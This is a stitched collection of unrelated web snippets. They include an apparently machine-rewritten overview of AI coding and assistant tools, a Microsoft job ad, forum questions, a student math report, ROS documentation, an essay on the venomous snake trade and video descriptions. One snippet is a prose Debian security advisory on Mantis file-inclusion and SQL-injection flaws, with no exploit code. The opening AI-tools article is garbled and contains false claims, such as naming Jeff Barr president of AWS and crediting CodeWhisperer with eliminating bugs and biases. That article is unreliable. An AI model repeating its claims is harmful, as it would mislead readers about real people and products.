Deep TabNine Like many machine-learning tools, requires lots of processing power to run efficiently. This is the reason the software is cloud-based, and powered by Google’s Kubernetes Engine. The program analyzes patterns of statistical analysis in data to predict what to enter next. It’s been trained on over 2 million files on GitHub.
Users can sign-up for a free trial of the software, but must be willing to pay for additional features and functions like persona types, voice search, and API support. Additionally, there are tutorials and a user-friendly dashboard, along with fast response times and quality customer support provided by the program.
Like the GitHub Copilot, Tabnine places emphasis on the training of its models using ethically sourced data. In order to achieve this, the company has revamped the company’s AI models and improved the way it incorporates new models into its platform. Rather than having one only model Tabnine has now multiple tailored AI models after thoroughly evaluating the one that is most suitable to its users’ needs.
Codewhisperer is a machine learning (ML)-powered coding companion that helps increase the efficiency of developers by offering code suggestions. The application makes use of contextual cues such as the cursor’s location and the code it is displaying to push its recommendations accordingly.
CodeWhisperer is a program developed through Amazon Web Services, is compatible with every programming language , or IDE that is supported by AWS including VS Code, IntelliJ IDEA, PyCharm and WebStorm. Additionally, CodeWhisperer features a security scanner and reference tracking feature which will scan your code for security holes.
CodeWhisperer, like the GitHub’s Copilot is an AI-assisted software development tool that interprets developers’ comments and automatically suggests code they could use for their own projects. It was trained using a large library of open source code as well as internal data for training from Amazon.
Jeff Barr, AWS Vice Chief Evangelist and President of the company said CodeWhisperer can be a part of the IDE to help developers write code more efficiently and quickly. It uses multiple context clues like where the cursor is located, code preceding it and other files in a project to move its recommendations forward.
CodeWhisperer, similar to ChatGPT creates code snippets in various programming languages, as well as technical documents. The service is supported by an open-source community comprising over one thousand artificial intelligence specialists who have contributed their expertise.
CodeWhisperer might not include all the features ChatGPT has However, it is able to provide a viable alternative for many users. It assists coders in getting their work done quicker and more accurately while eliminating possible biases or bugs.
Another option is LaMDA which is an AI-powered dialog system created by Google that can comprehend and respond to complex inquiries and debates. The platform has been pre-trained on 137 billion parameters as well as 1.56T terms of freely accessible internet documents and dialog information and has been fine-tuned for quality, safety and solidity.
5. Google Assistant
Google Assistant is a voice-activated virtual assistant that is designed to help with daily tasks using your smartphone. Compatible with phones running Android 5.0+ and compatible smart speakers such as Google Home, this virtual assistant can simplify many of your tasks on the go.
SearchEngine can be utilized to control and speak commands of various devices that support it, such as smart lighting bulbs, thermostats and televisions. In addition, Speech Recognition is supported with support for a variety of languages.
Google Assistant not only answers your queries, but it can also show pictures, emails, or other data depending on what you’ve asked it do. For instance, you could request photos of a visit or a conference or send emails from Gmail about a specific topic or individual.
You could ask Assistant to provide you with an overview of the events that occurred during the day or to check the weather forecast. It can also read out news stories from a variety of sources.
If you’re a music buff Assistant can play tracks and albums with only the phrase “Play my favorite song.” It’s a simple command – just ask Assistant, “Play my favorite song.”
Another great characteristic that is a highlight of Google Assistant is its capability to translate signs with Lens. Simply point your smartphone’s camera at a sign, and it will overlay the text with an accurate translation in the language you choose.
Google Assistant now features Scheduled Actions that let you manage all your smart home devices through a single interface. It’s particularly useful for connecting new devices like the C as well as the Ecobee smart thermostats to your Google account.
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Microsoft is the worldwide leader in software, services, devices and solutions, founded in 1975. As a leader in platform and productivity for the mobile-first, cloud-first world, we believe in what people make possible. Our mission is to empower every person and every organization on the planet to achieve more. I am because we are” – the popular African proverb asserts. It also best describes our relationship with the continent of Africa over the last 20 years.
We are recruiting to fill the position below:
Job Title: Programmer – Africa to Redmond
- Do complex problems make you thrive? You are intellectually curious and love to innovate and collaborate. Join Microsoft to envision, create and build the solutions and tools of the future. Together, let’s empower billions. This is where grassroots innovation and large-scale engineering coexist. The environment can lead to some fascinating stories.
- Development Engineering: Your work is core to what we do. Development massive, complex software systems that scale to billions.
- Customer-facing technologist: Use your technical expertise in the planning, execution and communications of prorgam activities.
Benefits and Perks
- Building world-changing solutions
- Network and collaborate with the brightest in the industry
- Work-life balance and the flexibility to work remotely allows teams to be productive anywhere
- Endless career paths filled with robust and diverse roles.
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Still somewhat of a beginning programmer. But having a small issue.
the box is obviously there as the information that goes within it populates when the link is clicked to populate the area. however the background does not show.
i need the background element out separate so that only it goes transparent. Don't want the text transparent. If i modify the code to move the background-color property inside the #main id it will show the background. Can't figure out what i'm doing wrong. Any assistance would be helpful. Thank you.
Re: box not showing
your CSS is invalid, there's no tag named <background>.
if you created a <background> inside a tag with id #main that background tag will simply get ignored, you can't css it.
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Installation - Easy to install and configure. I was up and running in a matter of minutes. Though I only had one pdf document, I was excited to see how powerful Documents Seller. I can see that it will fit our needs as we grow and add more documents.
Support - I posted several questions on the forum that got answered within minutes. I felt like I was talking to them in realtime. When I couldn't figure out a problem I was having, I contacted the support team on Skype. I provided him with backend access to help troubleshoot a problem I had for hours. He figured out the problem within 10 minutes. Tuan is the man!! He is not only technically sharp, but patient and respectful. This made it worth every penny. You can't find better support for a product than these guys. I highly and enthusiastically recommend them!
As my team's Joomla guru, I feel like Tuan and his support team have my back, so I'm never at a loss. Great product, tremendous, helpful, fast, courteous support. No regrets here!
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IntroI am researching math; what math does, when it started, why we need it, and all about it.
OverviewMath is important, now I know many people hate math but if we didn’t have math we wouldn’t have anything. Try to think of some thing that doesn’t use math.
Timeline• 70,000 BCE South Africa, rocks were scratched with geometric patterns.• 1000 BCE Fractions used by the Egyptians, but only one unit fractions were used i.e. ½ 1/3 ¼• 1st century The earliest reference to square roots of negative numbers.• 1579 François Vieta used a 393,216-sided polygon to figure out the first ten digits of Pi.• 2002 Yousama Kanada and a team of 12 more compute Pi to 1241.1 billion digits using a Hitachi 64-node supercomputer.
Worst areas• Some areas where people don’t focus on math as much as people in the U.S.A could be any where that does not have money for school or school’s that don’t have money.
Compare and Contrast• Math in the past is the same as math now because we had to remember stuff. There different because we have more technology than is 70,000 BCE.
Solutions• We could fix math by having the government build schools for other countries and the countries relive the debt that we owe them.
Personal connections• I think math is fun but some times math is so boring, like when you have to do stuff you did 2 years ago. The parts of math I like are Group Theory and Topology.
Human Impact• Math affects the human body because they will not know how to do certain things.
Financial impact• Building schools will cost money and resources.
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I have a Napili template when I enter a string in the search box and click 'Search', nothing is found. The type-ahead feature is returning articles. If I click on Topics, then Articles are displayed. I have another Community that is working as expected, and I have compared all the configuration settings I can think of and I don't see any differences. Do you know I am doing wrong?
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To start with, the MarkLogic REST API assumes three job roles for individuals: The developer. The REST API Tutorial ¶ Well hey there! RESTful Web Services are basically REST Architecture based Web Services. In REST Architecture everything is a resource. RESTful web services are light weight, highly scalable and maintainable and are very commonly used to create APIs for web-based applications.
Its implementation may vary in style, approach. As an API consumer this can be a frustrating experience. The quality of REST services varies wildly. Leonard Richardson put together a maturity model that. In this Laravel API tutorial, we explore the ways to build — and test — a robust RESTful web service using Laravel. The most important ones for building RESTful API are GET, POST, PUT and DELETE. Step by step tutorial on building a REST API with Spring (and securing it with Spring Security).
This guide is a step-by-step approach to designing a RESTful API using best practices. It will explain in detail data formats, architectural decisions, and how to implement real-time communication into your API. REST is an architecture style for designing networked applications, and an API that adheres to the.
Splunk provides an API method for every feature in our product. Programs talk to the Splunk API over HTTP, the same protocol that your web browser uses to interact with. As such, it is important for Web developers and architects to have a clear understanding of REST and RESTful services. While REST stands for Representational State Transfer, which is an. REST API Automation Testing Tutorial with Rest Assured API Testing Tutorial API Automation Testing Tutorials in Java.
As a mobile app developer, I love to build. Create a new Django project named tutorial, then start a new app called quickstart. Learn how to build a Restful CRUD API for a simple Note-Taking application using Spring Boot, Mysql, JPA and Hibernate.
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Vulnerability Assessment & Network Security Forums
If through a vulnerability assessment, a network security issue is detected for the vulnerability below, applying the appropriate security patches in a timely matter is very important. If you have detected that your system has already been compromised, following CERT's Network Security recovery document will assist with recommended steps for system recovery.
Vulnerability Assessment Details
Detailed Explanation for this Vulnerability Assessment
Joao Gouveia discovered an uninitialized variable which was insecurely
used with file inclusions in the mantis package, a php based bug
tracking system. The Debian Security Team found even more similar
problems. When these occasions are exploited, a remote user is able
to execute arbitrary code under the webserver user id on the web
server hosting the mantis system.
Jeroen Latour discovered that Mantis did not check all user input,
especially if they do not come directly from form fields. This opens
up a wide variety of SQL poisoning vulnerabilities on systems without
magic_quotes_gpc enabled. Most of these vulnerabilities are only
exploitable in a limited manner, since it is no longer possible to
execute multiple queries using one call to mysql_query(). There is
one query which can be tricked into changing an account's access
Jeroen Latour also reported that it is possible to instruct Mantis to
show reporters only the bugs that they reported, by setting the
limit_reporters option to ON. However, when formatting the output
suitable for printing, the program did not check the limit_reporters
option and thus permited reporters to see the summaries of bugs they
did not report.
Jeroen Latour discovered that the page responsible for displaying a
list of bugs in a particular project, did not check whether the user
actually has access to the project, which is transmitted by a cookie
variable. It accidentally trusted the fact that only projects
accessible to the user were listed in the drop-down menu. This
provides a malicious user with an opportunity to display the bugs of a
private project selected.
These problems have been fixed in version 0.17.1-2.2 for the current
stable distribution (woody) and in version 0.17.4a-2 for the unstable
distribution (sid). The old stable distribution (potato) is not
affected, since it doesn't contain the mantis package.
We recommend that you upgrade your mantis packages immediately.
Solution : http://www.debian.org/security/2002/dsa-153
Network Security Threat Level: High
Networks Security ID: 5504, 5509, 5510, 5514, 5515, 5563, 5565
Vulnerability Assessment Copyright: This script is (C) 2005 Michel Arboi
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No Discussions have been posted on this vulnerability.
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(I know I already posted about this yesterday)
I will pay you (via Venmo) to make the following logo:
To find the image:
- Google "northeastern husky logo"
- Go to images
- It is the first one (top left). It should be just the head of the husky.
Name a reasonable price and we will negotiate if needed.
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Unmanaged sections are text sections which contain HTML code. This code cannot be modified by the rich-text editor directly. The Stages editor only offers a dialog window with no WYSIWYG-options.
Unmanaged sections can be:
- Created manually by using the Unmanaged HTML Section button on the toolbar.
- Created by the validation/migration process
Unmanaged sections can be changed or edited by simply double clicking on the Unmanaged HTML Section symbol at the text position.
Unmanaged sections can be deleted by simply deleting the Unmanaged HTML Section symbol at the text position.
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for Windows and Linux
for macOS Ctrl+Alt+S
This page appears only when the Grazie bundled plugin is enabled on the Settings/Preferences | Plugins page as described in Installing plugins from JetBrains repository.
Use this settings page to select the languages in which PhpStorm should check texts for typos, spelling mistakes, grammatical errors, and so on. Out of the box, PhpStorm includes English language support. See Proofreading for details.
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Launchable Studio is a web development agency helping startup founders validate ideas fas by building simple, affordable & launchable web apps.
It specializes in rapidly transforming web app ideas into minimum viable products (MVPs), specifically targeting startup founders. Their focus is on helping clients validate their business ideas quickly and efficiently through the development of simple, affordable, and launchable web apps.
Key features and services of Launchable Studio include:
Fast Development: Launchable Studio prides itself on its ability to turn a web app idea into a functional product in under 14 days. This rapid development process is designed for startup founders who need to validate their ideas and test the market swiftly.
Simple MVPs: The agency assists in identifying the core functionality of an idea and transforming it into a functional MVP. This focus on simplicity ensures that the MVP encompasses the most critical elements of the idea.
Affordability: Positioned as a cost-effective alternative to hiring a full-time development team or searching for freelancers, Launchable Studio offers a more economical solution for startups and businesses with limited budgets.
Launch-Ready Products: The MVPs developed by Launchable Studio are ready for market launch, enabling clients to start their business journey immediately.
Process and Timeline: Their workflow includes a free 30-minute discovery call, the development of an initial prototype within four days, a revision call, and the final MVP development over ten days.
Experienced Team: Comprising senior developers and startup founders, the team at Launchable Studio brings experience in shipping products quickly and efficiently. They have worked on products used by both small startups and Fortune 500 companies.
Pricing and Packages: Launchable Studio's MVP development starts at $1,999, which includes a free discovery call, a 14-day turnaround, and two included tweaks. Additional tweaks start at $999. They also offer a monthly subscription model for $1,999/month, which includes unlimited requests (one at a time) with a 3-day turnaround. This subscription is specifically for growing MVPs developed by Launchable Studio based on user feedback.
Customer Engagement: The agency encourages potential clients to schedule a free call to discuss their ideas and requirements.
In summary, Launchable Studio provides a quick and cost-effective solution for startups and entrepreneurs looking to rapidly develop and launch their web app ideas. Their streamlined process and experienced team make them a viable option for those seeking to create an MVP in a short timeframe.
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You're reading the documentation for a version of ROS 2 that has reached its EOL (end-of-life), and is no longer officially supported. If you want up-to-date information, please have a look at Iron.
ROS 2 Documentation
The Robot Operating System (ROS) is a set of software libraries and tools for building robot applications. From drivers to state-of-the-art algorithms, and with powerful developer tools, ROS has what you need for your next robotics project. And it’s all open source.
Since ROS was started in 2007, a lot has changed in the robotics and ROS community. The goal of the ROS 2 project is to adapt to these changes, leveraging what is great about ROS 1 and improving what isn’t.
Here you will find the official documentation on ROS 2, the newest version of ROS.
If you’re looking for documentation on ROS 1 (i.e., ROS as it has existed for several years, and what you might be using right now), check the ROS wiki.
Where to start
Newcomers and experienced ROS users should consult this overview of our user-centric content to find what they’re looking for.
Installation pages will help you setup ROS 2 for the first time. You can choose your platform as well as the installation type and distribution that suits your needs.
Tutorials walk you through learning ROS 2, whether you’re learning from scratch or looking for guidance on achieving more specific goals.
Concepts are high-level explanations and background information on core ROS 2 concepts, which should provide some context for topics covered in the tutorials.
Troubleshooting guides cover some specific common cases where issues can arise.
Contributing is what makes ROS 2 great! We have guides on best practices and methodology for contributing new ROS 2 content as well as migrating existing content from ROS 1 to ROS 2.
Getting help is always encouraged. Here you’ll find several ways to get answers to your questions or start a discussion.
There are plenty of resources available online to learn more about ROS 2. Here’s a few to start with:
The code for ROS 2 is open source and broken into various repositories. You can find the code for most of the repositories on the ros2 GitHub organization.
awesome-ros2 is a “cheat sheet” style quick reference for ROS 2 packages and resources to help GitHub users get to know ROS 2.
This set of ROSCon talks provides some context for various ROS 2 concepts.
About ROS 2
If you’re interested in the business and advancement side of the ROS 2 project, these pages provide high-level details in various related areas.
Releases of past, present and future ROS 2 distributions, including dates and changes made between distributions.
Features that are a part of the current ROS 2 release, plus content elaborating on each new feature.
Roadmap is a collection of feature ideas for ROS 2 not yet implemented, but coming soon.
Project governance is handled by the Technical Steering Committee, which you can learn more about here.
Marketing materials promoting ROS 2 can be downloaded from this page.
About this documentation
We’re always working hard on improving our documentation. You can help by submitting pull requests for fixes or issues for suggestions on our GitHub repository.
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So, sometimes, as far as I've noticed, two cats will show up in an area with the same name as your cat/ same name as other cats in the area. It's a bit awkward sometimes!
Something that I believe (though may be mistaken) would be easy to add into the game would be to check if a cat with the same name was already in a certain area when the cats in an area are generating. I feel like that would add a bit more clarity to things! However, I understand that this could be difficult to add into the game for coding reasons! In that case- it's fine! It's just a minute change anyways^^
i'm rosie i have asd, i might not understand everything that's said to me
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> I changed the MathType from
> (radial,gate) -> (x,y,z) -> (gatevalue)
> and attached the x,y,z axes to the Display axes
> and I do get filled pixels.
I spoke too soon ... there is still a problem.
I do get filled pixels in the xy plane, but
things are not filled along the surface of the
cone ... instead I get rings.
There is a snapshot and source code at:
a) I am using x,y,z as the domain, so why is
the x-y direction working, but not the z-component?
b) Is there a conical geometry in visad that
I am overlooking here?
c) How do I tell the display not to interpolate
but use the nearest neighbor?
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When companies employ link scanners to click all the links in an email to verify it's safe before delivering it to the user do they ever click the same link more than once? I'm thinking of requiring at least 2 clicks on a given link to qualify someone for Clicked status in an email program - and for scoring and IMs. I created a smart list as a test with the clicked twice requirement and still saw cases where there were 8-10 people from the same company in the smart list.
(Note that my SL has filters for clicked link in email, link is, min num times is 2 for each link in the email. An the filter logic is any. In other words, I didn't make the mistake of filtering for clicked twice in the email).
I posted questions on this topic in another thread on "bot clicks" but this is a specific question and I didn't want it to get lost in the other more general thread.
Yes, they do re-click links as a failsafe (since a link destination can change in an instant).
Over time, sure. The ones that integrate with mailbox servers (i.e. Exchange) can rescan periodically for as long as the message remains.
Sanford Whiteman have you found a resolution to the human vs bot activity dilemma? I would be happy if I could filter out 3/4s of the bot clicks as long as I didn't lose any human clicks.
We have social links in all of our emails which does it make it easier to spot some bot activity. It baffles me to think there isn't an automated way to filter out this activity. e.g. "if clicked 7 links in 5min"
It baffles me to think there isn't an automated way to filter out this activity. e.g. "if clicked 7 links in 5min"
It's not as simple as that, though in any case it's not possible in the Marketo UI. The granularity simply isn't there, and triggers w/Activity Log lookback filters are a bad move for overall performance to begin with.
Offline crunching of the Activity Log using a timeseries database or SQL windowing can help.
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The Naples Daily News recently published a statistic that surprised (and scared) even me. In a five year period between 2000 and 2005 over 1,000 puff adder snakes were imported into the United States through ports in Florida. These are big, 4-5 foot long, venomous snakes. They get their name from their habit of sucking in air to expand their body size accompanied by a hiss that sounds like you punctured a car tire with a bowie knife. They bite, and kill, more people in Africa than any other reptile. They aren’t a particularly aggressive snake but they like to lay still and rely on their camouflage for concealment. Most victims simply step on them.
I suppose we can consider ourselves lucky to have a python problem, not a puff adder problem, here in south Florida. Puff adders can produce anywhere from 20-50 young with a record of over 100. That’d be a real problem even when considering the typical survival rate for reptiles is only 10%. Our python issue is tame by comparison. Yes, pythons can produce as many baby snakes but pythons aren’t killing thousands annually overseas. Puff adders are.
But our puff adder import issue begs the larger question: Should there be hundreds of these potentially deadly snakes in backrooms and basements across America? In a recent search of the record keeping system shared by all zoos in North America I found only nine puff adders in five institutions. Those snakes have a purpose. One of the many legitimate reasons for zoos is to be a window to the natural world, to show us what is out there. A zoo offers opportunities to discover and appreciate all species of life near and far. Do I expect the average zoo visitor to run home and cut a check to save puff adders? No, but remember when you protect habitat for one species, you protect all species. Save wild places for African lions and you save rhinos, giraffe, and yes, even puff adders.
So why do we need hundreds, if not thousands, of puff adders and many other dangerous snakes in the private sector? The simple answer is we
don’t. I am not advocating that the sale of corn snakes or geckos comes to a grinding halt. With good research there are many species of reptiles that the average and responsible person can learn to care for. And I do believe there is a place for qualified venomous snake keepers outside of the zoo system. Many have advanced knowledge of the husbandry and breeding of dangerous snakes. Some keep snakes to produce lifesaving antivenins. I have learned much from such individuals. However, there are still many outlets where inexperienced handlers can acquire venomous snakes to keep in their homes for all the wrong reasons. This is a practice that must stop.
I am all about less government intervention in our lives but this whole issue of exotic pets is well past ripe for change. The international trade in live and dead animals is only exceeded by the illegal drug trade. Nearly all the live animal trade goes into the private sector. Only 1% of zoo animals come from native countries. At least here in Florida venomous snake owners must be licensed by the state. My personal license hangs by my desk. The license alone does not make me an expert; I learn new things about reptiles every day. But it does validate I have the time and experience to know the basic care and handling of dangerous reptiles. If more states would institute similar baseline programs and the Federal government would tighten up loose import restrictions, both people and animals would benefit.
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- published: 21 Mar 2014
- views: 79326477
Presenting ‘Tunak Tunak Tun’ music video sung by the talented Daler Mehndi Song Name - Tunak Tunak Tun Album - Tunak Tunak Tun Singer - Daler Mehndi Music - Ravi Pawar Lyrics - Daler Mehndi, Sanjeev Anand, Yogesh & Shahab Allahabadi Music Label - Sony Music Entertainment India Pvt. Ltd. © 1998 Magnasound Media Pvt. Ltd. under exclusive license to Sony Music Entertainment India Pvt. Ltd. Subscribe: VEVO - http://www.youtube.com/user/sonymusicindiavevo?sub_confirmation=1 Like us: Facebook: https://www.facebook.com/SonyMusicIndia Follow us: Twitter: https://twitter.com/sonymusicindia G+: https://plus.google.com/+SonyMusicIndia
Presenting Tunak Tunak Tun in an epic metal version. Daler Mehndi gave a master piece to the world in the 90's and we recreated it with the help of Bonde do Metaleiro, all the way from Brazil! Bonde do Metaleiro's channel: https://www.youtube.com/user/calonense Support us in our videos - (See your name at the end credits) https://www.patreon.com/bloodywood Buy Mp3 : iTunes - https://goo.gl/pQ6wvq Google Play - https://goo.gl/XnEsKx Spotify - https://open.spotify.com/album/4Na6rrHOK4y0N8ExUbzKDx Connect with Bloodywood: https://www.facebook.com/bloodywood.delhi Email: email@example.com
I do not claim this video as my own. Here is the original link: https://www.facebook.com/BuzzFeedIndia/videos/1277538275639990/
Hey guys, So I saw this floating around in some comments and then jammed out to it at the tattoo shop I frequent and just couldnt resist such a hilariously awesome song. Thank you guys so much for everything from the bottom of my heart. Big ups for all the messages, donations, subs, comments, fan art, suggestions, and support. It means the world and you always rock the casbah!! Best to ya E Facebook: http://www.facebook.com/pages/Eric-Calderone/149426498434986 Tab book and MP3: http://www.shredguitareric.com/ Itunes: http://itunes.apple.com/us/album/no-more-heroes/id526970196 CDbaby: http://www.cdbaby.com/AlbumDetails.aspx?AlbumID=erock12 Twitter: https://twitter.com/331erock Merch Store: http://www.cafepress.com/331erock NEW SHIRT SHOP:http://www.merchaddict.com/331EROCK NE...
This is one of our Dance Party Friday videos (from April 24, 2009). Bloomingdale High School - Valrico, FL ** check out our other awesome videos at http://www.youtube.com/WBULTV ** artist: Daler Mehndi song: Tunak Tunak Tun
SUBSCRIBE to the REACT Channel: http://goo.gl/47iJqh Watch all episodes of Laugh Challenges - https://goo.gl/Ql6AgN Watch the original videos featured in this episode! Subscribe!: https://goo.gl/zIUnxa SUBMIT A VIDEO TO TRY TO GET THE REACTORS TO LAUGH: firstname.lastname@example.org Watch all REACT channel videos from this week - http://goo.gl/th0yyt The Reactors come together to play the Laughing Challenge! Videos featured in this episode: Daler Mehndi - Tunak Tunak Tun Video https://www.youtube.com/watch?v=vTIIMJ9tUc8 Look at all those... https://www.youtube.com/watch?v=F-X4SLhorvw Everything Poops https://www.youtube.com/watch?v=VuqyZC2haBI George gets hit in the face by a baguette! https://www.youtube.com/watch?v=ua0KzTi1vTo Apple Juice Time Remix https://www.youtube.com/watch?v=ojQ...
Dance along to the ToDieFor Mix of the viral rage #TunakTunakTun with the original sensation Daler Mehndi. The biggest Dance rage of 2016 started as a stressbuster for kids doing exams in Belgium and quickly grew to be a favourite across the globe with even Jackie Chan busting a move to this popular track! Artist - ToDieFor feat. Daler Mehndi Music - Daler Mehndi Lyrics - Daler Mehndi; Sanjeev Anand; Yogesh; Shahab Allahabadi Label - Sony Music India A huge shout out and thank you to WBULTV forletting us use their Dance Party Friday video from Bloomingdale High School - Valrico, FL Original: ITunes: http://apple.co/28RvxSY Gaana: http://bit.ly/28PmXQ9 Remix: iTunes: http://smarturl.it/TunakTunakrmx_it Spotify: http://smarturl.it/TunakTunakRmx_Sp Apple Music: http://smarturl.it/TunakT...
This will probably be the last conventional WOAH meme. Credits: Chris O'Neill's voice Daler Mehndi - Tunak Tunak Tun Copyright Disclaimer Under Section 107 of the Copyright Act 1976, allowance is made for "fair use" for purposes such as criticism, comment, news reporting, teaching, scholarship, and research. Fair use is a use permitted by copyright statute that might otherwise be infringing. Non-profit, educational or personal use tips the balance in favor of fair use. This video was made for entertainment purposes, and is transformative in nature.
A mashup of Roadman Shaq / MC Quakez - The Ting Goes (Man's Not Hot) and Daler Mehndi - Tunak Tunak Tun. The new TING GO SKRRA x TUNAK TUNAK TUN meme! This is basically The Ting Goes Tunak Tunak Tun [REMIX]. Please like this video and subscribe if you enjoyed it because it took quite a while to make! And thanks for 79.5K subscribers! 😆 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Twitter: https://twitter.com/kadz12yt (@Kadz12yt) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Second Channel: https://www.youtube.com/channel/UC_485Ao_SxlCaBlOZORVsVQ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Discord server: https://discord.gg/2sE7yGF ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Support me on Patreon: https://www.patreon.com/kadz12 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I'll make you a meme on Fiverr: https://www....
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umm it was a bit strange, il give you some ups and downs
-it looked like a water dragon or somthing..how did the 4 wheeler drive in water, and if not the dragon had no feet...
-after the switching of heads i think you put just a bit to many lol
hope this helps
This one was better. Though, work harder.
But of course, your so much better then me, because I havent made a flash yet.
After watching this, and playing your rpg battle 9 I have one thing to say to you. you have great potential. Go watch some tutorials, and keep practicing, something i like about the 2 ive seen so far, they are simple, and have EXTREME potential. I know i havent made ant games myself, and the videos i have made are those of wich i never posted on newgrounds, however i critique alot, and try to give constructive criticism. Anyways, watch tuts, write down the most useful stuff you found, and then your on your way! =D i love that your stuff seems to have an rpg feel, ( of course the rpg battle ) but even this movie. You get too mant negative posts, seriously. Anyways, dont give up, and keep practicing.
if this was ur best the it sucked
You should learn GRAMMER AND SPELLING!!!!!!!!!!!!!
Better than the ones before that I've seen.
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Do we support multiple application package config files in SDK? We have 100s of services and forms and it would be impossible to put everything in a single application package. We will get timeout if we try to push everything in one go. To resolve this, we manage multiple (small chunk) of application packages in TM, but its manual process. However we would like to manage this through SDK, how do we achieve this?
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